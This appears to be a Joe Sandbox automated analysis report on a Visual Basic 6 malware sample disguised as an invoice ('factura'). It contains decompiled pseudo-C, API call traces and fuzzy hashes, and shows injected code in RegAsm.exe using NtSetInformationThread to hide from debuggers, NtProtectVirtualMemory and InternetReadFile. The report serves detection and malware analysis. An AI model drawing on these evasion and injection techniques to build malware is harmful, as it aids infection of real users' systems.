__vbaChkstk.MSVBVM60(?,00401426), ref: 00408CC7
#536.MSVBVM60(00000002), ref: 00408CFD
__vbaStrMove.MSVBVM60(00000002), ref: 00408D07
__vbaFreeVar.MSVBVM60(00000002), ref: 00408D0F
#561.MSVBVM60(00000003,00000002), ref: 00408D26
__vbaFreeVar.MSVBVM60(00000003,00000002), ref: 00408D3D
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000005B,Mislike,00000003,00000002), ref: 00408D55
__vbaFreeStr.MSVBVM60(00408D73,00000003,00000002), ref: 00408D6D

Strings

Mislike, xrefs: 00408D4A

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$#536#561ChkstkFileMoveOpen
String ID: Mislike
API String ID: 36235136-2753466597
Opcode ID: e3f2dad8b2a9839efeeda8bb2d399947cf88829036c1a7351c7237d4810bafee
Instruction ID: 88236c19a57bf4f3f8f3b5dd41b6f8785fd085712f05bcf07473127ed9282cec
Opcode Fuzzy Hash: e3f2dad8b2a9839efeeda8bb2d399947cf88829036c1a7351c7237d4810bafee
Instruction Fuzzy Hash: 00112B75900208ABCB14EFA1CC5ABDEBBB8BF04714F54463AF101BA2E1DB7C9545CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040A7FA, Relevance: 13.6, APIs: 9, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040A7FA(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				char _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _t73;
				signed int _t78;
				signed int _t83;
				signed int _t87;
				void* _t95;
				void* _t97;
				intOrPtr _t98;

				_t98 = _t97 - 0xc;
				 *[fs:0x0] = _t98;
				L00401420();
				_v16 = _t98;
				_v12 = 0x4013d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401426, _t95);
				if( *0x40c33c != 0) {
					_v68 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026e4);
					L0040165A();
					_v68 = 0x40c33c;
				}
				_v44 =  *_v68;
				_t73 =  *((intOrPtr*)( *_v44 + 0x14))(_v44,  &_v36);
				asm("fclex");
				_v48 = _t73;
				if(_v48 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026d4);
					_push(_v44);
					_push(_v48);
					L00401654();
					_v72 = _t73;
				}
				_v52 = _v36;
				_t78 =  *((intOrPtr*)( *_v52 + 0x140))(_v52,  &_v40);
				asm("fclex");
				_v56 = _t78;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x140);
					_push(0x402934);
					_push(_v52);
					_push(_v56);
					L00401654();
					_v76 = _t78;
				}
				_v28 = _v40;
				L004015E8();
				_t83 =  *((intOrPtr*)( *_a4 + 0xa8))(_a4,  &_v32);
				asm("fclex");
				_v44 = _t83;
				if(_v44 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0xa8);
					_push(0x402484);
					_push(_a4);
					_push(_v44);
					L00401654();
					_v80 = _t83;
				}
				_push(_v32);
				_push(0);
				L0040167E();
				asm("sbb eax, eax");
				_v48 =  ~( ~_t83 + 1);
				L0040166C();
				_t87 = _v48;
				if(_t87 != 0) {
					_t87 =  *((intOrPtr*)( *_a4 + 0x15c))(_a4, 0x3695);
					asm("fclex");
					_v44 = _t87;
					if(_v44 >= 0) {
						_v84 = _v84 & 0x00000000;
					} else {
						_push(0x15c);
						_push(0x402484);
						_push(_a4);
						_push(_v44);
						L00401654();
						_v84 = _t87;
					}
				}
				_push(E0040A9A5);
				return _t87;
			}

0x0040a7fd
0x0040a80c
0x0040a816
0x0040a81e
0x0040a821
0x0040a828
0x0040a837
0x0040a841
0x0040a85b
0x0040a843
0x0040a843
0x0040a848
0x0040a84d
0x0040a852
0x0040a852
0x0040a867
0x0040a876
0x0040a879
0x0040a87b
0x0040a882
0x0040a89b
0x0040a884
0x0040a884
0x0040a886
0x0040a88b
0x0040a88e
0x0040a891
0x0040a896
0x0040a896
0x0040a8a2
0x0040a8b1
0x0040a8b7
0x0040a8b9
0x0040a8c0
0x0040a8dc
0x0040a8c2
0x0040a8c2
0x0040a8c7
0x0040a8cc
0x0040a8cf
0x0040a8d2
0x0040a8d7
0x0040a8d7
0x0040a8e4
0x0040a8eb
0x0040a8fc
0x0040a902
0x0040a904
0x0040a90b
0x0040a927
0x0040a90d
0x0040a90d
0x0040a912
0x0040a917
0x0040a91a
0x0040a91d
0x0040a922
0x0040a922
0x0040a92b
0x0040a92e
0x0040a930
0x0040a937
0x0040a93c
0x0040a943
0x0040a948
0x0040a94e
0x0040a95d
0x0040a963
0x0040a965
0x0040a96c
0x0040a988
0x0040a96e
0x0040a96e
0x0040a973
0x0040a978
0x0040a97b
0x0040a97e
0x0040a983
0x0040a983
0x0040a96c
0x0040a98c
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A816
__vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 0040A84D
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 0040A891
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,00000140), ref: 0040A8D2
__vbaFreeObj.MSVBVM60 ref: 0040A8EB
__vbaHresultCheckObj.MSVBVM60(00000000,004013D8,00402484,000000A8), ref: 0040A91D
__vbaStrCmp.MSVBVM60(00000000,?), ref: 0040A930
__vbaFreeStr.MSVBVM60(00000000,?), ref: 0040A943
__vbaHresultCheckObj.MSVBVM60(00000000,004013D8,00402484,0000015C), ref: 0040A97E

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$CheckHresult$Free$ChkstkNew2
String ID:
API String ID: 1969955383-0
Opcode ID: 536d1e14e713f835675f7ab7e8da9efe86fd684afa52689b549abdfa6a595ca8
Instruction ID: cadf4b2c4d296786da8d3df8a5b35fd9ed5db18fa00182bed9a9024f87c65372
Opcode Fuzzy Hash: 536d1e14e713f835675f7ab7e8da9efe86fd684afa52689b549abdfa6a595ca8
Instruction Fuzzy Hash: F5511271A00208EFCF01EFA5C889BDDBBB0BF18705F14842AF405BA2A0D7795895DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040981C, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E0040981C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				intOrPtr _v32;
				char _v40;
				void* _t9;
				short _t10;
				intOrPtr _t18;

				_push(0x401426);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t18;
				_t9 = 0x28;
				L00401420();
				_v12 = _t18;
				_v8 = 0x4012e8;
				_push(2);
				_push("ABC");
				_push(0x402954);
				_push(0);
				L00401564();
				if(_t9 != 3) {
					_push(L"Katakrese3");
					_push(0x9b);
					_push(0xffffffff);
					_push(0x20);
					L004015D6();
				}
				_v32 = 0x80020004;
				_v40 = 0xa;
				_t10 =  &_v40;
				_push(_t10);
				L0040155E();
				_v24 = _t10;
				L0040164E();
				_push(E004098A8);
				return _t10;
			}

0x00409821
0x0040982c
0x0040982d
0x00409836
0x00409837
0x0040983f
0x00409842
0x00409849
0x0040984b
0x00409850
0x00409855
0x00409857
0x0040985f
0x00409861
0x00409866
0x0040986b
0x0040986d
0x0040986f
0x0040986f
0x00409874
0x0040987b
0x00409882
0x00409885
0x00409886
0x0040988b
0x00409892
0x00409897
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 00409837
__vbaInStr.MSVBVM60(00000000,00402954,ABC,00000002,?,?,?,?,00401426), ref: 00409857
__vbaFileOpen.MSVBVM60(00000020,000000FF,0000009B,Katakrese3,00000000,00402954,ABC,00000002,?,?,?,?,00401426), ref: 0040986F
#648.MSVBVM60(0000000A,00000000,00402954,ABC,00000002,?,?,?,?,00401426), ref: 00409886
__vbaFreeVar.MSVBVM60(0000000A,00000000,00402954,ABC,00000002,?,?,?,?,00401426), ref: 00409892

Strings

ABC, xrefs: 0040984B
Katakrese3, xrefs: 00409861

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$#648ChkstkFileFreeOpen
String ID: ABC$Katakrese3
API String ID: 620541583-2512978052
Opcode ID: 7179c265118fd54e41a8289b0963a5da268af9174ecb6c5540ce8acfd95a7fcc
Instruction ID: 7c2ed1092784b21df74b8f55658112da2dc2d21b75212565eee53853e695481f
Opcode Fuzzy Hash: 7179c265118fd54e41a8289b0963a5da268af9174ecb6c5540ce8acfd95a7fcc
Instruction Fuzzy Hash: 3FF0A4B1A80308B7D710EB958E0BF9DBA68EB01B14F60452BF101761E1D6FD5D00876D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A102, Relevance: 12.1, APIs: 8, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040A102(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				signed int _v84;
				signed int _t55;
				signed int _t60;
				signed int _t61;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t72 = _t71 - 0xc;
				 *[fs:0x0] = _t72;
				L00401420();
				_v16 = _t72;
				_v12 = 0x401388;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x401426, _t69);
				L004014F8();
				if( *0x40c33c != 0) {
					_v76 = 0x40c33c;
				} else {
					_push(0x40c33c);
					_push(0x4026e4);
					L0040165A();
					_v76 = 0x40c33c;
				}
				_v48 =  *_v76;
				_t55 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v44);
				asm("fclex");
				_v52 = _t55;
				if(_v52 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x4026d4);
					_push(_v48);
					_push(_v52);
					L00401654();
					_v80 = _t55;
				}
				_v56 = _v44;
				_t60 =  *((intOrPtr*)( *_v56 + 0xd0))(_v56,  &_v40);
				asm("fclex");
				_v60 = _t60;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0xd0);
					_push(0x402934);
					_push(_v56);
					_push(_v60);
					L00401654();
					_v84 = _t60;
				}
				_t61 = _v40;
				_v72 = _t61;
				_v40 = _v40 & 0x00000000;
				L00401678();
				L004015E8();
				_v36 = 0xefe20c20;
				_v32 = 0x5afb;
				_push(E0040A239);
				L0040166C();
				return _t61;
			}

0x0040a105
0x0040a114
0x0040a11e
0x0040a126
0x0040a129
0x0040a130
0x0040a13f
0x0040a142
0x0040a14e
0x0040a168
0x0040a150
0x0040a150
0x0040a155
0x0040a15a
0x0040a15f
0x0040a15f
0x0040a174
0x0040a183
0x0040a186
0x0040a188
0x0040a18f
0x0040a1a8
0x0040a191
0x0040a191
0x0040a193
0x0040a198
0x0040a19b
0x0040a19e
0x0040a1a3
0x0040a1a3
0x0040a1af
0x0040a1be
0x0040a1c4
0x0040a1c6
0x0040a1cd
0x0040a1e9
0x0040a1cf
0x0040a1cf
0x0040a1d4
0x0040a1d9
0x0040a1dc
0x0040a1df
0x0040a1e4
0x0040a1e4
0x0040a1ed
0x0040a1f0
0x0040a1f3
0x0040a1fd
0x0040a205
0x0040a20a
0x0040a211
0x0040a218
0x0040a233
0x0040a238

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0040A11E
#554.MSVBVM60(?,?,?,?,00401426), ref: 0040A142
__vbaNew2.MSVBVM60(004026E4,0040C33C,?,?,?,?,00401426), ref: 0040A15A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004026D4,00000014), ref: 0040A19E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402934,000000D0), ref: 0040A1DF
__vbaStrMove.MSVBVM60(00000000,?,00402934,000000D0), ref: 0040A1FD
__vbaFreeObj.MSVBVM60(00000000,?,00402934,000000D0), ref: 0040A205
__vbaFreeStr.MSVBVM60(0040A239), ref: 0040A233

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$CheckFreeHresult$#554ChkstkMoveNew2
String ID:
API String ID: 787552733-0
Opcode ID: 2ed1c37450c66321c9424734d92535101f148a839997e76f0c384793f68f701b
Instruction ID: 8a106783a13c553a3dc7a81569b50320577885b547e7067d3a6b179f5e5a779c
Opcode Fuzzy Hash: 2ed1c37450c66321c9424734d92535101f148a839997e76f0c384793f68f701b
Instruction Fuzzy Hash: A331E070D00208EFDB00EFA5D989BDDBBB4AF18314F10816AE401BB2A0D7795955DFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACBA, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0040ACBA(signed int __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				void* _t20;
				void* _t23;
				void* _t27;
				void* _t30;
				void* _t31;

				 *(_t31 + __eax * 2 - 0x73) =  *(_t31 + __eax * 2 - 0x73) << 0x45;
				asm("in al, 0x89");
				asm("lodsb");
				 *0xc7 =  *0xc7 | 0x000000c7;
				 *((intOrPtr*)(__ebx - 0x177c1fbb)) =  *((intOrPtr*)(__ebx - 0x177c1fbb)) + __ecx;
				 *__edi =  *__edi + __ecx;
				 *(__edi + 0x50000000) =  *(__edi + 0x50000000) ^ 0x0000008d;
				_t30 = _t27 + 3;
				asm("lodsb");
				_push(0xc7);
				_push(_t30 - 0x34);
				L004014B6();
				_t20 = _t30 - 0x34;
				_push(_t20);
				L004015B2();
				_t23 = _t30 - 0x1c;
				asm("in al, 0xe8");
				 *((intOrPtr*)(_t23 - 1)) =  *((intOrPtr*)(_t23 - 1)) - 0xcc4d8dff;
				L0040164E();
				_push(E0040AD64);
				L0040166C();
				return _t20;
			}

0x0040acba
0x0040acbf
0x0040acc5
0x0040acc6
0x0040acc9
0x0040accf
0x0040acd1
0x0040acd8
0x0040acd9
0x0040acda
0x0040acde
0x0040acdf
0x0040ace4
0x0040ace7
0x0040ace8
0x0040acef
0x0040acf1
0x0040acf3
0x0040acfa
0x0040ad39
0x0040ad5e
0x0040ad63

APIs

#617.MSVBVM60(?,000000C7), ref: 0040ACDF
__vbaStrVarMove.MSVBVM60(?,?,000000C7), ref: 0040ACE8
__vbaStrMove.MSVBVM60(?,?,000000C7), ref: 0040ACF2
__vbaFreeVar.MSVBVM60(?,?,000000C7), ref: 0040ACFA
__vbaFreeStr.MSVBVM60(0040AD64,?,?,00004008,?), ref: 0040AD5E

Strings

E, xrefs: 0040ACBA

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$FreeMove$#617
String ID: E
API String ID: 501449635-3568589458
Opcode ID: 929917c894c969490b79ea6e7b976f73392685b115ad431e6a14597425a20043
Instruction ID: 9b5c172a01215c68d18dcd2bd0667265768ada3595a1460480cb69f3f4c1064b
Opcode Fuzzy Hash: 929917c894c969490b79ea6e7b976f73392685b115ad431e6a14597425a20043
Instruction Fuzzy Hash: CCF0BE6480934567C704E6B0D845EEEBBBA6F00308F78477BA092620E3EF3C2616C74A

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD02, Relevance: 9.0, APIs: 6, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0040AD02(void* __ebx) {
				void* _t12;

				asm("in al, 0x89");
				asm("lodsb");
				 *0xc7 =  *0xc7 | 0x000000c7;
				if(__ebx + __ebx != 0) {
					asm("in al, 0xe8");
					 *((intOrPtr*)(_t12 - 1)) =  *((intOrPtr*)(_t12 - 1)) - 0xcc4d8dff;
					L0040164E();
				} else {
					_push(__ebp - 0x54);
					_push(__ebp - 0x34);
					L004014B6();
					_push(__ebp - 0x34);
					L004015B2();
					L00401678();
					L0040164E();
				}
				_push(E0040AD64);
				L0040166C();
				return 0xc7;
			}

0x0040ad03
0x0040ad09
0x0040ad0a
0x0040ad0f
0x0040acf1
0x0040acf3
0x0040acfa
0x0040ad11
0x0040ad14
0x0040ad18
0x0040ad19
0x0040ad21
0x0040ad22
0x0040ad2c
0x0040ad34
0x0040ad34
0x0040ad39
0x0040ad5e
0x0040ad63

APIs

__vbaFreeVar.MSVBVM60(?,?,000000C7), ref: 0040ACFA
#617.MSVBVM60(?,00004008,?), ref: 0040AD19
__vbaStrVarMove.MSVBVM60(?,?,00004008,?), ref: 0040AD22
__vbaStrMove.MSVBVM60(?,?,00004008,?), ref: 0040AD2C
__vbaFreeVar.MSVBVM60(?,?,00004008,?), ref: 0040AD34
__vbaFreeStr.MSVBVM60(0040AD64,?,?,00004008,?), ref: 0040AD5E

Memory Dump Source

Source File: 00000000.00000002.1021604413.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1021596243.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1021619032.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1021628536.000000000040E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_factura.jbxd

Similarity

API ID: __vba$Free$Move$#617
String ID:
API String ID: 3552338408-0
Opcode ID: 9d0c72816ea4e4e6e93de16860ba862567839bfabae52770dbd2a2e6c7ff2b0f
Instruction ID: f55d4adb1359f36abd4b8e94486312e99d48286980c8b0af80ae4aa256154519
Opcode Fuzzy Hash: 9d0c72816ea4e4e6e93de16860ba862567839bfabae52770dbd2a2e6c7ff2b0f
Instruction Fuzzy Hash: D6F082759002089BC700F7F1DD55CFDB379AE00304778463BA012764E2EE3E5A06874A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 5388 Parent PID: 7088 RegAsm.exeCOMMON

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	31.3%
Total number of Nodes:	345
Total number of Limit Nodes:	1

Executed Functions

Function 00C001DE, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumWindows.USER32(00C00203,?,00000000,00C0244C,00C00A0F,?,00000000,?,00000050,00000369,?,00007EF9,00000079,?,00000000), ref: 00C001EA
NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C002A2

Strings

1.!T, xrefs: 00C00287

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumInformationThreadWindows
String ID: 1.!T
API String ID: 1954852945-3147410236
Opcode ID: 8290a7d0ea485f84a71fc05ce66a317cbefedf250b441f37851246e1a8887803
Instruction ID: 55d17980e1577e334a2252a58ddd83e52119ef641849b2e599e37f30cf75b677
Opcode Fuzzy Hash: 8290a7d0ea485f84a71fc05ce66a317cbefedf250b441f37851246e1a8887803
Instruction Fuzzy Hash: 7031E4B0B40305AFEF21AF648C96BDD3792AF86364FA54216FD556B2C1CA34C846D741

Uniqueness

Uniqueness Score: -1.00%

Function 00C00219, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 87
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C02A2C: LoadLibraryA.KERNEL32(?,321C9581,?,00C02F6A,00C01430,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C02A87

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C002A2

Strings

1.!T, xrefs: 00C00287

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: InformationLibraryLoadThread
String ID: 1.!T
API String ID: 543350213-3147410236
Opcode ID: 2a21159d658b231a9be4fb76f67c7b8cf0f1d300a368ebaff8781a66a60ddcc0
Instruction ID: 2e854e65e3bf25d7d768a56209bd3f41f5569d2ac2cd1dd776b56d6c99924e2e
Opcode Fuzzy Hash: 2a21159d658b231a9be4fb76f67c7b8cf0f1d300a368ebaff8781a66a60ddcc0
Instruction Fuzzy Hash: AB2125B0B40309AFEF20AF648CA6BD937929F86764F954215FD542B2C1CA34CC49D741

Uniqueness

Uniqueness Score: -1.00%

Function 00C00AE8, Relevance: 1.9, APIs: 1, Instructions: 400
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3cc4c12eef8dccb4db0d64f7c1835ae39ca29fb27bba43177fa71f976073b7c1
Instruction ID: 73ae7fc1750e115282c649cf71753557ec54a48243ac96c65afe6f6bf5f0d9f6
Opcode Fuzzy Hash: 3cc4c12eef8dccb4db0d64f7c1835ae39ca29fb27bba43177fa71f976073b7c1
Instruction Fuzzy Hash: F1D11771700702AFDB24AF68CD85BE5B3A5FF05360F654229FCA993381DB34A855DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C035C9, Relevance: 1.6, APIs: 1, Instructions: 99
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetReadFile.WININET(?,?,?,?,?,000000C0,?,?,-00000001,?,00C00127,00000000), ref: 00C036B8

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 9ee27bd1d1670b0679a038fccfdd7fd474a8f3111ce2216514e61a4e32609548
Instruction ID: 25e5cb29bc41127ebdb8bffa6b668800f42bca7f24d48a34e6d14c5cc6fabedf
Opcode Fuzzy Hash: 9ee27bd1d1670b0679a038fccfdd7fd474a8f3111ce2216514e61a4e32609548
Instruction Fuzzy Hash: 12314931B00A469FEF269E24C9597D53396FF51324F9A8269E824C72E4D33ACBC4CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00C01D57, Relevance: 1.5, APIs: 1, Instructions: 38
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00C00A0F,?,00000000,?,00000050,00000369,?,00007EF9,00000079,?,00000000), ref: 00C02266

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a9f8aef0f28014ce79938ae5fa672dea7dfdb1874de8bf8e286df9429011e6fc
Instruction ID: 02f268faf38743dd0f131695002fd4ce74366bf8cb4a5a0a949fd2e90197e8eb
Opcode Fuzzy Hash: a9f8aef0f28014ce79938ae5fa672dea7dfdb1874de8bf8e286df9429011e6fc
Instruction Fuzzy Hash: 90F0226504D3C52FD31BAB704956A99BF54BB93320B1DC2CED8804E0E3C7589B0AE326

Uniqueness

Uniqueness Score: -1.00%

Function 00C02A2C, Relevance: 1.5, APIs: 1, Instructions: 38
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00C02F6A,00C01430,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C02A87

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: cb1c9b970aa955e1ceed1acd26fcead5be75840c0b51afa2a919bf41ebf8f0ee
Instruction ID: 41d1c9b5a511fd32fa97abde2535c21eeabe3d87aa40a5e614f5808ce4aafb4a
Opcode Fuzzy Hash: cb1c9b970aa955e1ceed1acd26fcead5be75840c0b51afa2a919bf41ebf8f0ee
Instruction Fuzzy Hash: E2F0A080B402193AEF307B75AE5DBAE3645CF417B4F248615FCA6A10C6CF38C685F0A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C031B1, Relevance: 1.5, APIs: 1, Instructions: 13
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000000,?,00C02FC1,00000040,00C01430,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C031CA

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 00C00315, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

down, xrefs: 00C029F7

Memory Dump Source

Source File: 0000000F.00000002.1031687205.0000000000C00000.00000040.00000001.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_c00000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: down
API String ID: 1029625771-486510651
Opcode ID: 4e794c59ab959970ffc0bcf9ed64c87f9f18672d482a1ddcb7688cc89a64bfc5
Instruction ID: 9d12b2a8b4f6675fb00943e85c0131759931915a30a71fbbd9eafbb64c62854b
Opcode Fuzzy Hash: 4e794c59ab959970ffc0bcf9ed64c87f9f18672d482a1ddcb7688cc89a64bfc5
Instruction Fuzzy Hash: 94C1C0307403066EDF312A748D9ABED33569F437A0F7A4216FCA59B1D2CB39C986E511

Uniqueness

Uniqueness Score: -1.00%

Function 00C01E02, Relevance: 3.1, APIs: 2, Instructions: 107
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

